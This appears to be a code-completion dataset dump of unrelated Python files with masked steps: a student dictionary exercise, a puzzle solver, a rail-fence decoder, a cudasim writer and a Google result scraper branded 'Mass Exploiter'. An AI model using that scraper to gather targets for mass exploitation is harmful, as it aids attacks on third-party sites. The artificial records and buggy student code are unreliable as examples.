"step-2": "<mask token>\nprint('dict_test: ', dict_test)\n<mask token>\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n<mask token>\ndict_test.pop(int(del_key))\nprint(dict_test)\n<mask token>\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n<mask token>\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-3": "my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,\n 'born_town': 'Khmelniysky'}\ndict_test = {key: (key ** 2) for key in range(7)}\nprint('dict_test: ', dict_test)\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-4": "# lesson 4 Mateush Vilen\n\nmy_information = {\n 'name': 'Vilen',\n 'last_name': 'Mateush',\n 'how_old': 31,\n 'born_town': 'Khmelniysky'\n}\n\ndict_test = {key: key**2 for key in range(7)}\nprint('dict_test: ', dict_test)\n\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\n\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\n\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n\n\n# ------------My database------------:\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key)+1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key)-1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
states.add('.'.join(str(n) for n in mem))
<|reserved_special_token_0|>
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
import fileinput
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
#!/usr/bin/env python3
import fileinput
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print("Part 1:", steps)
part2 = statehash
part1_steps = steps
else:
if statehash == part2:
print("Part 2:", steps - part1_steps)
break
else:
states.add(statehash)
|
flexible
|
{
"blob_id": "0e7d4b73cedf961677e6b9ea5303cdb3a5afa788",
"index": 3521,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nstates.add('.'.join(str(n) for n in mem))\n<mask token>\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-3": "<mask token>\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-4": "import fileinput\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-5": "#!/usr/bin/env python3\n\nimport fileinput\n\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\n\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\n\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print(\"Part 1:\", steps)\n part2 = statehash\n part1_steps = steps\n else:\n if statehash == part2:\n print(\"Part 2:\", steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""Google Scraper
Usage:
web_scraper.py <search> <pages> <processes>
web_scraper.py (-h | --help)
Arguments:
<search> String to be Searched
<pages> Number of pages
<processes> Number of parallel processes
Options:
-h, --help Show this screen.
"""
import re
from functools import partial
from multiprocessing import Pool
from time import time as timer
import requests
from bs4 import BeautifulSoup
from docopt import docopt
def get_urls(search_string, start):
temp = []
url = 'http://www.google.com/search'
payload = {'q': search_string, 'start': start}
my_headers = {'User-agent': 'Mozilla/11.0'}
r = requests.get(url, params=payload, headers=my_headers)
soup = BeautifulSoup(r.text, 'html.parser')
h3tags = soup.find_all('h3', class_='r')
for h3 in h3tags:
try:
temp.append(re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1))
except:
continue
return temp
def main():
start = timer()
result = []
arguments = docopt(__doc__, version='MakMan Google Scrapper & Mass Exploiter')
search = arguments['<search>']
pages = arguments['<pages>']
processes = int(arguments['<processes>'])
####Changes for Multi-Processing####
make_request = partial(get_urls, search)
pagelist = [str(x * 10) for x in range(0, int(pages))]
with Pool(processes) as p:
tmp = p.map(make_request, pagelist)
for x in tmp:
result.extend(x)
####Changes for Multi-Processing####
result = list(set(result))
print(*result, sep='\n')
print('\nTotal URLs Scraped : %s ' % str(len(result)))
print('Script Execution Time : %s ' % (timer() - start,))
if __name__ == '__main__':
main()
# End
|
normal
|
{
"blob_id": "68dcac07bbdb4dde983939be98ece127d963c254",
"index": 3610,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport re\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom time import time as timer\nimport requests\nfrom bs4 import BeautifulSoup\nfrom docopt import docopt\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"Google Scraper\n \nUsage:\n web_scraper.py <search> <pages> <processes>\n web_scraper.py (-h | --help)\n \nArguments:\n <search> String to be Searched\n <pages> Number of pages\n <processes> Number of parallel processes\n \nOptions:\n -h, --help Show this screen.\n \n\"\"\"\n\nimport re\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom time import time as timer\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom docopt import docopt\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\?q=(.+?)\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version='MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n ####Changes for Multi-Processing####\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n ####Changes for Multi-Processing####\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n\n # End\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from cudasim.ParsedModel import ParsedModel
import re
import copy
class Writer:
def __init__(self):
pass
# replace the species and parameters recursively
@staticmethod
def rep(string, find, replace):
ex = find + "[^0-9]"
while re.search(ex, string) is not None:
res = re.search(ex, string)
string = string[0:res.start()] + replace + " " + string[res.end() - 1:]
ex = find + "$"
if re.search(ex, string) is not None:
res = re.search(ex, string)
string = string[0:res.start()] + replace + " " + string[res.end():]
return string
def categorise_variables(self):
# form a list of the species, and parameters which are set by rate rules
model = self.parser.parsedModel
rule_params = []
rule_values = []
constant_params = []
constant_values = []
for i in range(len(model.listOfParameter)):
is_constant = True
if not model.listOfParameter[i].getConstant():
for k in range(len(model.listOfRules)):
if model.listOfRules[k].isRate() and model.ruleVariable[k] == model.parameterId[i]:
rule_params.append(model.parameterId[i])
rule_values.append(str(model.parameter[i]))
is_constant = False
if is_constant:
constant_params.append(model.parameterId[i])
constant_values.append(str(model.parameter[i]))
species_list = copy.copy(model.speciesId)
species_list.extend(rule_params)
species_values = map(lambda x: str(x), model.initValues)
species_values.extend(rule_values)
return species_list, constant_params, species_values, constant_values
|
normal
|
{
"blob_id": "acd0b9019ef413699b47ecb2b66a0980cf3aa81f",
"index": 9792,
"step-1": "<mask token>\n\n\nclass Writer:\n <mask token>\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Writer:\n <mask token>\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-3": "<mask token>\n\n\nclass Writer:\n\n def __init__(self):\n pass\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-4": "from cudasim.ParsedModel import ParsedModel\nimport re\nimport copy\n\n\nclass Writer:\n\n def __init__(self):\n pass\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-5": "from cudasim.ParsedModel import ParsedModel\nimport re\nimport copy\n\nclass Writer:\n\n def __init__(self):\n pass\n\n # replace the species and parameters recursively\n @staticmethod\n def rep(string, find, replace):\n ex = find + \"[^0-9]\"\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + \" \" + string[res.end() - 1:]\n\n ex = find + \"$\"\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + \" \" + string[res.end():]\n\n return string\n\n def categorise_variables(self):\n # form a list of the species, and parameters which are set by rate rules\n model = self.parser.parsedModel\n\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n\n return species_list, constant_params, species_values, constant_values\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import datetime
now = datetime.datetime.now()
# Printing value of now.
print ("Time now : ", now)
|
normal
|
{
"blob_id": "0110d26e17a5402c22f519d0aeb2aacca3279d00",
"index": 7792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Time now : ', now)\n",
"step-3": "<mask token>\nnow = datetime.datetime.now()\nprint('Time now : ', now)\n",
"step-4": "import datetime\nnow = datetime.datetime.now()\nprint('Time now : ', now)\n",
"step-5": "import datetime \r\n\r\nnow = datetime.datetime.now() \r\n \r\n# Printing value of now. \r\nprint (\"Time now : \", now) \r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
s = '''Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски
аpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё
он ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон
ыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га
ынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »
иусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе
еоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы
т аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. оевлявеб отеь Нтр и ею н он гдп еоа
мж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне
оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч
ртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер
й к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4'''
def fence_decipher(m: str, key: int) -> str:
chunklens = [0 for _ in range(key)]
nfence = 0
dx = 1
for i in m:
chunklens[nfence] += 1
nfence += dx
if dx == 1 and nfence == key - 1:
dx = -1
elif dx == -1 and nfence == 0:
dx = 1
print(chunklens)
chunks = []
x = 0
for chunklen in chunklens:
chunks.append(list(m[x:x + chunklen]))
x += chunklen
nfence = 0
dx = 1
ans = []
for _ in m:
ans.append(chunks[nfence].pop(0))
nfence += dx
if dx == 1 and nfence == key - 1:
dx = -1
elif dx == -1 and nfence == 0:
dx = 1
return ''.join(ans)
if __name__ == '__main__':
print(fence_decipher(s, 4))
|
normal
|
{
"blob_id": "a8bed0b5a6a95d67b5602b395f1d0ea12cd53fb0",
"index": 9166,
"step-1": "<mask token>\n",
